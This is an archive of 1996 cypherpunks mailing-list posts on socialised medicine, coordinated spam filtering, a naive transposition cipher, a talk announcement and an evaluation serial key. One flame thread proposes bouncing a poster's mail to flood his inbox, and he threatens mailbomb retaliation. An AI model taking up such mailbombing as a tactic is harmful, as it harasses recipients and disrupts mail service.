    dang!  time wasted again; back he goes to [filter...] > /dev/null.
    Isn't procmail a nice toy?!?


--
  Dr. Dimitri is like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Sep 1996 06:20:17 +0800
To: jbugden@smtplink.alis.ca
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Politica...
In-Reply-To: <9608178429.AA842985398@smtplink.alis.ca>
Message-ID: <Pine.SUN.3.94.960917141612.24479A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996 jbugden@smtplink.alis.ca wrote:

> Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant)
> 
> Black Unicorn <unicorn@schloss.li>
> >On Mon, 16 Sep 1996 jbugden@smtplink.alis.ca wrote:
> >> Specifically, that anyone can "save for a rainy day" and still not be
> >> able to provide for events that can always happen: Heart attack,
> >> stroke, car accident, pinched nerve that leaves you in excruciating
> >> pain and unable to work for several years.
> >
> >Understand what it is you are saying.
> >
> >You are saying that everyone on the planet has a right to health
> > insurance and disability insurance whether they can afford it or not.
> > This is folly.  The result is serious moral hazard problems.
> 
> Almost, but not quite. I'm saying that within our two countries at least
> (Canada, U.S.) everyone could have access to medically necessary procedures
> because the *society as a whole* can afford it.

Your statement above is a loaded gun.  The decisions about what is or is
not medically necessary must by design be made by government in a
socialized medicine regime.  If I need to get in to why, it is because
you don't understand socialized medicine as well as you think you do.  As
for society as a whole being able to afford it, that's hogwash unless you 
permit serious restrictions on the definition of "medically necessary."

This evades an important point as well.  Namely, who cares if society can
afford it?  Should it have to?  Why is Joe Cracksmoker's fifteenth CBC
blood test a bill that the taxpayer must pick up?  Since when is every
citizen on the planet entitled to free health insurance?

> I understand moral hazard and risk pool seperation. I also understand that the
> insurance bureacracy required to manage much of the U.S. health care system
> absorbs much of the money going into the system. Managing risk pool seperation
> proves to be expensive, or perhaps just very profitable.

Of course it's profitable.  Health care is not PBS.  There is a price to
be paid for getting someone else to promise to pay your bills if you get
sick.  To have it otherwise is to have a free lunch.  There is no such
thing.

The reality is that socialized medicine, in every example I can think of,
is merely low end health care.  Anyone who can afford it opts out of the
program and seeks the better quality and shorter lines within the private
health care system.  (Often in another country).
 
> > Social safety nets prevent rioting by the lower classes, revolution and
> > general civil disorder because they appease the masses.  Indeed this
> > is a form of health and life insurance for the middle and upper classes.
> 
> Absolutely. And it is a scheme that many of the lower classes pay into. Since it
> is to our mutual benefit (yours and mine), I choose not complain about it.

I'm not going to complain about it so long as you don't put me in a
position where I am asked to pay for every nerotic and friendless patient
who calls the ambulance on a lonely night for company.  (A friend of mine
once worked EMS Boston, by his estimate his ambulance alone ran up about
$7500 a month visiting ten or eleven such individuals.  They'd get a call
for a heart attack or somesuch and then some sweet old lady would invite
them up for coffee).

> > Spreading the risk, by itself, does NOT reduce cost.  
> > You must properly PRICE risk.
> 
> Agreed. But there is a balance between accurately pricing the risk and
> minimizing the cost of the bureacracy that polices this pricing. 

Oh, I see.  Let's give the program to the government then.  Good idea.
That will reduce the cost of the bureacracy.

> There are also many ways to modify behaviour, not all of them direct. We only
> need a correlation here, not causation. For example, high taxes on smoking and
> drinking or spot checks for drunk driving. All of these correlate with a
> reduction in high risk behaviour and a reduction in health costs.

And all of them buy into the notion that people are not to be made
personally responsible for their high risk behavior.  Instead, according
to these solutions, it is the role of government to identify it, and
discourage it.  I prefer market solutions.

> There is much potential for moral hazard when the PRICE for your insurance is
> affected by the accuracy of your disclosure. How will they ever know...
> 
> Fact: Canada spends less than the U.S. per capita on health care, while
> covering more people in percentage terms.

Fact: I would sever my own festering leg before I would check into a
Canadian hospital.

> And he brought the present unto Eglon king of Moab: and Eglon was a 
> very fat man. [Judges 3:17]
> 
> "Of all tyrannies a tyranny sincerely exercised for the good of its victims  
>  may be the most oppressive. It may be better to live under robber barons  
>  than under omnipotent moral busybodies. The robber baron's cruelty may  
>  sometimes sleep, his cupidity may at some point be satiated; but those who  
>  torment us for own good will torment us without end, for they do so with 
>  the approval of their own conscience."   -  C.S. Lewis, _God in the Dock_ 

It seems C.S. Lewis agrees with me on this point too.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Sep 1996 06:02:44 +0800
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: no internet gambling
In-Reply-To: <Pine.GSO.3.93.960917133357.27150C-100000@nebula>
Message-ID: <Pine.SUN.3.94.960917143243.24479B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, [ISO-8859-1] Jüri Kaljundi wrote:

> 
> From todays Baltic News Service newswire (my free translation):
> 
> According to the ministry of finance of Estonia, they will not give any
> licences or permission to organize Internet gambling or lotteries in
> Estonia. 
> 
> The reason given was, that arranging lotteries on the Internet would take
> the activity outside from Estonia. According to the news, the only
> Internet gambling licences given out are in Liechtenstein and Ahvenamaa
> (part of Finland).
> 
> My question is: how easy it is to get a licence for Internet casino in
> either Liechtenstein

Tere.

Rather difficult.

> or some off-shore country (Belize, Bahamas etc) ?

I'm not sure about these others.

> Jüri Kaljundi
> AS Stallion
> jk@stallion.ee

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 18 Sep 1996 07:07:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <3.0b19.32.19960917142515.00a05cf0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 AM 9/16/96 EST, jbugden@smtplink.alis.ca wrote:
>Two questions, two observations:
>Do you have health insurance?
>Do you have life insurance?
>
>I have commented on your line of reasoning before and and it still seems
to me
>that an important part of the discussion is missed. Specifically, that anyone
>can "save for a rainy day" and still not be able to provide for events
that can
>always happen: Heart attack, stroke, car accident, pinched nerve that
leaves you
>in excruciating pain and unable to work for several years.

However, one can also prepare in the traditional way by having friends and
family.  If you have same, you will always have enough to eat and someone
to take care of you (and also to kick you in the ass when you need it.

>I don't think that a reasonable person would argue that medical insurance
should
>be outlawed because everyone should take care of their own needs. A social
>safety net is simply a form of health and life insurance. Statistical
arbitrage
>if you will. By spreading the risk you minimize the cost. 

Somewhat actuarily unsound however.  If "the welfare" or SS were private
charities or insurance schemes, their management would be in prison for
self-dealing and fraud because of the high overhead of welfare and the
Ponzi scheme nature of SS.

Note too the recent article in the Economist about how European firms are
raising capital in the UK and the US because it is available there in
private pension savings while European government retirement systems suck
loads of capital out of the system leaving nothing but massive government
debts.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Wed, 18 Sep 1996 07:32:32 +0800
To: cypherpunks@toad.com
Subject: Dealing with junk mail
Message-ID: <01I9L7W8DYNA8ZO0TR@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## 09/17/96 09:26 am ##
  Subject: Dealing with junk mail ]

There has been a bunch of stuff in the news lately about junk
e-mail, including the recent judge's ruling that AOL must allow
known junk-mail through to its subscribers while the judge hears
arguments from AOL and the junk-mailers.

I'm a little divided on the whole issue of whether or not it's wise
policy for ISPs to, in general, refuse to deliver suspected junk
mail.  The obvious problem is that it puts ISPs in the position of
deciding whether or not some piece of e-mail is worthwhile.  (To
clarify, I certainly *don't* think that ISPs should be prohibited by
law from blocking delivery of or access to anything they choose
to--there are plenty of ISPs to choose from, and users can move if
they don't like their current ISPs' policies.  I just don't think
I'd like Delphi to start filtering my e-mail without asking me for
permission and instructions first.)

I've been thinking about an alternative approach to blocking
commercial spam.  It has some potential technical problems, but I
think it could be made into a workable 95% or so filter.

Many people are already filtering messages locally, and now some
providers are getting into the act, as well.  Unfortunately, because
of the economics of junk e-mail, I think that this, by itself, will
probably lead to people refusing to accept almost all e-mail from
people they don't know.  This is a really bad outcome.

What I'm proposing is an extension to this, in which many peoples'
filters coordinate their actions to detect and block spam.

Each user has a mail filter with a set of rules written either by or
for that user.  The mail filter does one of four things with each
piece of e-mail it receives:

a.   It lets the e-mail through immediately.  (E-mail from friends,
employers, employees, family members, etc. would probably be in this
category.)
b.   It discards the e-mail immediately.  (E-mail from people you
really didn't like, and from people who have spammed you in the past
would probably be in this category.)
c.   It puts the e-mail on hold in some storage area.
d.   Send e-mail back to the sender, informing him of conditions
     under which the user is willing to accept this e-mail.  This
     might be things like requiring anonymous users to provide some
     minimal kind of identity, or telling senders ``I'll read your
     e-mail for one dollar in digicash,'' or ``I'll read your e-mail
     if you carry out this computationally expensive calculation, or
     some other thing.

For e-mail in the third category, some kind of summary report is
sometimes generated, to be sent to a server.  The server collects
these reports, and uses some kind of system (maybe rule-based, but
probably involving scores to estimate probability of spam or other
unwanted e-mail) to determine what is and is not spam, and with what
probability.  It then sends to each of its subscribers, every day or
so, a report indicating scores for users' messages.  (These should
be individualized.)

The mail filters then do one of four things to each piece of mail
rated, based on the scores:

a.   Pass the message through immediately.
b.   Discard the message immediately.
c.   Add the message to a list of low-priority messages, to be read
     when the user has some spare time.
d.   Send e-mail back to the sender, informing him of conditions
     under which the user is willing to accept this e-mail.  This
     might be things like requiring anonymous users to provide some
     minimal kind of identity, or telling senders ``I'll read your
     e-mail for one dollar in digicash,'' or ``I'll read your e-mail
     if you carry out this computationally expensive calculation, or
     some other thing.

The junk e-mailers can try various countermeasures to this.  The
most obvious are:

a.   Try to hit people who aren't using a good junk-mail filter.
b.   Try to make it against the law to use a junk-mail filter.
     (Perhaps this would be the case only for PSA spams?)
c.   Try to disguise their e-mail to make it not obviously junk
     e-mail, and simultaneously to alter each message to avoid
     detection by the servers, by making changes to each message,
     timestamp, and claimed sender ID.

I think (c) will be somewhat difficult for the junk e-mailers, if
the people who run the servers are reasonably clever.  The servers
should run indexes that find many identical or similar sentences,
paragraphs, etc, in messages sent to many people.  I think either
the junk e-mailers would give up on these filters immediately, or
there would be an endless arms race between advertisers and filter
servers.

There are some potential problems with this approach, though.  The
servers will be getting a lot of information about what e-mail is
coming to each of their users.  There will be serious privacy
concerns, especially if the filters work after decrypting public-key
encrypted messages.  (Note that if the user's public key is
reasonably long, PK encrypting the message will actually be pretty
hard for thousands or millions of messages at a time.  Also, there
will be various denial-of-service attacks, where I know Alice is
getting ready to send Bob some e-mail I don't want him to get, so I
intercept Alice's e-mail and forward it to 10,000 other people--thus
ensuring that it will be classified as spam.

Comments?

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj7vzUHx57Ag8goBAQGUbgQAsP62f0HDO4L0cs3DjCh9ppX3IgQUX8l6
W4JtH3WPfaHrzftD4UMGZ3D41kCjvGht/s62dPtq4lzDbqSpSB81oh4RVuyEw/kD
CZ4L0q2q6jFkTdnIp2mvP1WNlCTTpw2BBKY5U4tYCcthq8y30YmOGSqpKouK4l9S
gCV3Nd6C/Ig=
=Dent
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 18 Sep 1996 08:18:47 +0800
To: cypherpunks@toad.com
Subject: DCSB: Putting a Stock Exchange on the Net
Message-ID: <v0300780cae64b0d2fb42@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----


                 The Digital Commerce Society of Boston

                               Presents

                            Philippe Le Roux
                         Associe de V(DL)2 Inc.


                  "Putting a Stock Exchange on the Net"


                        Tuesday, October 1, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Philippe would like to talk about putting the Montreal Stock Exchange on
the Web - building the Net strategy, the implementation, the management
tools, and the impacts on the organization. If we can get a connection
and digital projector, he'll demo the project.

<If we can't, he'll just *talk* about it. ;-), -RAH>

Philippe Le Roux has worked for more than 15 years implementing new
technologies and analizing their socio-economic impact. Extensively
involved in the launching of Minitel in France and then Alex in Quebec,
he has worked with many groups involved with the Internet and On-Line
Services. For more than 10 years he's been giving conferences on
telematique and information highways in Europe, North and South America.
He is the North American correspondent for Planete Internet (France) and
regularly publishes articles in France, Quebec and the U.S. He is
co-author with Carol Baroudi and John Levine of Internet Secrets (IDG
Books 1995), and, under the direction of Pierre Musso and Jean Zeitoun,
the book Le Metafort D'Aubervillers (Editions Charles Le Bouil (France)
1995).


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, October 1, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, September 28, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 November  Philip S. Corwin  Regulatory Barriers to Internet Commerce
 December  "Black Unicorn"   Money Laundering: The Headless Horseman
                               of the Infocalypse
 January    TBA              1996 in Review / Predictions for 1997

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0, engine e19

iQCVAwUBMj79w/gyLN8bw6ZVAQGXkgQAi0nFz95uK6rBGSCvsP8hAvcolHKbRrFw
dwOmt97TxvWTYgEczZQiEFwS+WFgo6yGkQGO8jkmYWDKIuyf/JLGr46YaH5GH/rS
pKrWzgWnhRjX1vqesRrurcS3KuCK6EStZWLwJeRZzPc+s0fp0nv5p8mK2KaHxtRD
0eL3obNyUUk=
=HTUA
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 17 Sep 1996 17:52:49 +0800
To: wb8foz@nrk.com
Subject: Re: 56 kbps modems
Message-ID: <199609170629.QAA10129@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain



> Also note there's no mention of the hype-writer's old friend,
> compression.

But than if ypou are doing the compressed rate 56k is not that high. 
There are 28.8k modems that (in theory) do 336k including 
compression, so 56k would be redundant. Most current modems specify 
they will compress to 115k, whether they ever get close to this is 
unlikely

Craig

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Sep 1996 13:31:10 +0800
To: cypherpunks@toad.com
Subject: Snake-Oil products
Message-ID: <323F3541.7CC5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


If this were a board for a commercial monopoly such as the AMA, I could 
understand (albeit not necessarily agree with) the dire warnings about 
the people pushing "Snake-Oil" products, if indeed what's being promoted 
are actual products.

The large FAQ sheets are pretty good, actually, like a mini-review of 
crypto issues, but what is the purpose of the dire warnings in relation 
to this forum, other than certain parties marking their territory?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <printing@explicit.com>
Date: Wed, 18 Sep 1996 11:15:24 +0800
To: Michelle Thompson <mthompso@qualcomm.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
In-Reply-To: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com>
Message-ID: <Pine.BSD.3.92.960917162732.28589B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Michelle Thompson wrote:

> Interesting information from a friend of mine-
>
> >An american can not serve for pay for a position in another military
> >that could be filled by local populace.  I may have my jurisdiction
> >wrong tho, this could be an international law not a US law.
> >Basically, you can't go be a grunt or an assasin in another country,
> >because they can find their own,

What about the French Foreign Legion? or the Volunteers for Israel,
which isn't really a fighting force, but Americans can help keep
the Israeli army at a ready state.

> I believe that with the breakdown of the traditional sense of sovereignty,
> mercenary activity, whether military or commercial in nature, will increase.
> Engineering seems to be quite mercenary already, and very international.
> Marketing and advertising, to a novice (me), seem to be going the same way.

Depends on what you would qualify as being mercenary work, Would Americans
working on North Sea oil platforms getting paid $70,000+ a year tax free
be considered a mercenary? Or going down to the islands and opening a
data haven? Or maybe being the engineer for the Sultan of Brunei?

Marketing and advertising has always been mercenary work for as long
as I have been in it, Ask any number of freelancers who have been
slogging it out in the trenches.

William Knowles
President
Graphically Explicit Advertising

Hired Gun Since 1992!

--
Graphically Explicit Advertising       <printing@explicit.com>
PGP mail welcome & prefered / KeyID 1024/415D7FF9
PGP Fingerprint D3 45 A4 38 73 99 77 4A   98 BB A2 81 97 68 73 03
--
Explicit isn't a dirty word, Or is it?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "StarNine Eval Key Service" <keys@starnine.com>
Date: Wed, 18 Sep 1996 11:02:40 +0800
To: "Vac" <cypherpunks@toad.com>
Subject: Re: ListSTAR/SMTP
Message-ID: <n1369144065.19999@emod.starnine.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your authorization serial number for ListSTAR/SMTP.  Remember, only
one evaluation serial number is allowed per customer.  If you require
additional authorization serial numbers please contact our Sales Department. 
If you have any problems with the software, please contact our support staff
(support@starnine.com).  When you are ready to purchase ListSTAR/SMTP, you may
do so by contacting our Sales Department by phone at 1-800-525-2580, or by
sending email to sales@starnine.com.  You may also order some products Online
at <http://store.starnine.com/>

Thank you for evaluating ListSTAR/SMTP!

sales@starnine.com
(510) 649-4949

This key will expire in 30 days.

Key is for: ListSTAR/SMTP Demo
Key Serial Number: L*SM-386u-q9qE-%t4y-yptE
Key Support ID: 6-1399-KHQ
Key Duration: 47 Day(s)
Beginning: Sun, Sep 1, 1996
Expiring: Fri, Oct 18, 1996
Number of users/Options: 0


-------------------- Original Message Follows --------------------
Request for Eval Serial Number





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 18 Sep 1996 10:01:17 +0800
To: paul@fatmans.demon.co.uk
Subject: "Get a fucking life" (was Re: Diffie Hellman - logs in Galois fields)
In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk>
Message-ID: <9609172145.AA00585@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Paul Bradley (paul@fatmans.demon.co.uk) foams at the mouth:
>  Get a fucking life, seeing as you haven`t yet posted anything
>  relating remotely to the technical aspects of cryptography to
>  this list I think you need to take a long hard look at what
>  your saying loser....

Hey folks, when it is so obvious that someone is a looser that "Get a  
fucking life" flows so easily out of your keyboard, then there is no reason  
to post such missives publicly.  Just plonk'em and forget'em ... those of us  
who have already done so don't want to read this dreck either.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 18 Sep 1996 08:33:18 +0800
To: Dustbin Freedom Remailer <dustman@athensnet.com>
Subject: RE: Workers Paradise. /Political rant.
In-Reply-To: <199609171255.IAA00172@godzilla.athensnet.com>
Message-ID: <Pine.SUN.3.91.960917160327.11843B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


> So why in the world do those crazy Canadians keep coming here for

> BTW, looking at historical costs of medical care and the level of
>government involvement, it is safe to say that the US has too much
>socialism in our medical system right now, and that it what's making the
>best system (ours) so expensive when it would not be otherwise. 

I wouldn't be so proud of the US health care system; the actual quality 
of care is really pretty awful, even with insurance. Even though the 
NAtional Health Service in the uK is woefully underfunded, I've always 
had much better treatment than I have from HMOs here; even seeing a 
specialist privately, at home, with no insurance, is cheaper than getting 
an X-Ray looked at by someone who once met a radiologist a cocktail 
party. 

The UK split the provision of services from the purchasing, so that
hospitals have to compete for business, and a HMO like funding model for
primary care physicians - fixed capitation rates, so the more a doctor
spends, the less money he/she makes). It may be that the most efficient
solution for health-care is a hybrid scheme along these lines. 

There are ideological reasons that argue  for rejecting  such 
compulsory schemes  based on that element of coercion; it's hard to 
make the case against purely on efficiency grounds.

Simon  
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 17 Sep 1996 19:38:06 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Risk v. Charity (was: RE: Workers Paradise. /Political rant
Message-ID: <199609170703.RAA21552@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Personally, I paid my way through uni...full fees. I took out a loan 
when I developed cancer to pay  for it (as the health insurance was 
not finalised for aproval - so they got out of paying). The few 
months I was unemployed after I left the military because of a 
confict of interests I earned money by doing whatever I could get 
(even though I am an engineer I have worked in a petrol station). So 
why and for what reason sould I have to pay several 10's of thousands 
each year to support others. I have never taken help from the 
govenment, I do not feel I should have to pay as well.
And what am I paying for...to protect the status quo. I believe that 
there is more than enough help for ppl available. They just need to 
get off their butts and work.


> > tcmay@got.net (Timothy C. May) wrote:
> > >"Saving for a rainy day," whether saving, investing, getting an education
> > (while others are out partying), preparing, etc., all takes effort and
> > commitment. If those who save and prepare are then told they have to pay
> > high taxes to support those who partied....well, the predictable effect 
> > [...] is _more_ people in agony. When you tell people that a compassionate
> > society will meet their basic needs, a predictable fraction of them will choose
> > not to work hard and prepare themselves.
> > 
> > Two questions, two observations:
> > Do you have health insurance?
> > Do you have life insurance?
> 
> Yes, so?
> Yes, so?

Myself also yes,yes 

> > I have commented on your line of reasoning before and and it still
> > seems to me that an important part of the discussion is missed.
> > Specifically, that anyone can "save for a rainy day" and still not be
> > able to provide for events that can always happen: Heart attack, stroke,
> > car accident, pinched nerve that leaves you in excruciating pain and
> > unable to work for several years.
> 
> Understand what it is you are saying.
> 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjohnson@packetengines.com (stuart johnson)
Date: Wed, 18 Sep 1996 13:41:14 +0800
To: cypherpunks@toad.com
Subject: a simple cypher scheme
Message-ID: <9609180005.AA14720@ns.tsinet.com>
MIME-Version: 1.0
Content-Type: text/plain


all,

   i've been on cypherpunks for about a year a half now, and have wacthed
many interesting threads pass by but i've never posited anything.  what has
brought me out into the open is this : i work for an engineering firm doing
asic design, i use pgp ( as do all rational persons ), a co-worker here has
come up with a 'cypher' scheme that he would like to use to send code to our
clients.  the scheme is this : he would take the file of code and pad all
lines to the length of the longest line, he would then preform column swaps,
and then row swaps, to 'mix up' the file. the person receiving the file
would then preform the opposite functions to recover the file.  it seems so
simple that it can't be good. i've convenced him to use pgp, but i would
like some input if possible on why his cypher scheme is not a good one.

thanx 

-stuart
        Packet Engines - The Industry leader in Gigabit ethernet
/     o o o o o o o . . .
    o o    ______           _________ ________ ________ __=====__T___
    o      |DDD[   _______  |       | |      | |      |  |       |_|| 
  .][__n_n_|   |  | 802.3 | |  ATM  | | MPEG | | FDDI |  |  SCSI  |
 >(________|___|__|_______|_|_______|_|______|_|______|_.|________|_|
 _/oo OOOOO oo`   'o^o  o^o 'o^o  o^o`'o^o o^o`'o^o o^o`'o^o     o^o`
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+--+-+-+-+-+-+-+-+-+-+-+-+-+-+-+    
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
| "all sufficiently advanced            || Stuart Johnson
|  technologies are indistinguishable   || Lead Asic Engineer
|  from magic,"                         || Packet Engines Inc.
|  --Arthur C. Clarke                   || sjohnson@packetengines.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 14:37:50 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <Pine.3.89.9609171157.A9883-0100000@netcom>
Message-ID: <wN5euD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Z.B." <zachb@netcom.com> writes:

> On Mon, 16 Sep 1996 paul@fatmans.demon.co.uk wrote:
> 
> > 
> >  
> > The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ 
> > along the following lines:
> > 
> > Q> What do it do when I join the list?
> >  A> Killfile *@bwalk.dm.net
> >
> How about we go just a little farther than that and set up Procmail to 
> bounce all of his messages back to him?  I'd hate to see his inbox if 
> enough of us started doing that! <evil grin> 
> 
> 
> > 
> >   Datacomms Technologies web authoring and data security
> >      Paul Bradley, Paul@fatmans.demon.co.uk
> >        Http://www.fatmans.demon.co.uk/crypt/
> >          "Don`t forget to mount a scratch monkey"
> > 
> 
> ---
> 
> Zach Babayco
> 
> zachb@netcom.com  <----- finger for PGP public key
> http://www.geocities.com/SiliconValley/Park/4127
> 
> 

Yeah!!! And I'll bounce each mailbomb to everyone who tries it. Won't
that be fun.  Too ba your netcom account won't last long.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 18 Sep 1996 08:53:00 +0800
To: cypherpunks@toad.com
Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ]
In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM>
Message-ID: <9609172114.AA26321@outland>
MIME-Version: 1.0
Content-Type: text/plain


>>Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>>sequence from the net and insert it in some carrier bacteria and start
>>making Anthrax bacteria.  Neat!
> Now the bad news:  the DNA replicator only works under Windows 95 and comes
> with buggy drivers!

	Buggy drivers?  But isn't that the point in this case? :)

> Unfortunately, it can be very deadly.  The idea here is that it rarely infect
s
> humans - in the normal course of events.  If a determined biowarrior is tryin
g
> to infect people, all bets are off.

	The Frank Herbert (of _Dune_ fame) book _White Plague_ comes
to mind.  Basically a molecluar biologist's wife and kids are killed
by an IRA bomb while visiting Dublin.  He snaps and creates a plague
which kills women (men are carriers) as revenge.  All without using
that nasty Internet (in fact, the book was written back before even
ARPAnet).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 17 Sep 1996 19:46:43 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: Spam blacklist project
Message-ID: <199609170715.RAA24749@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


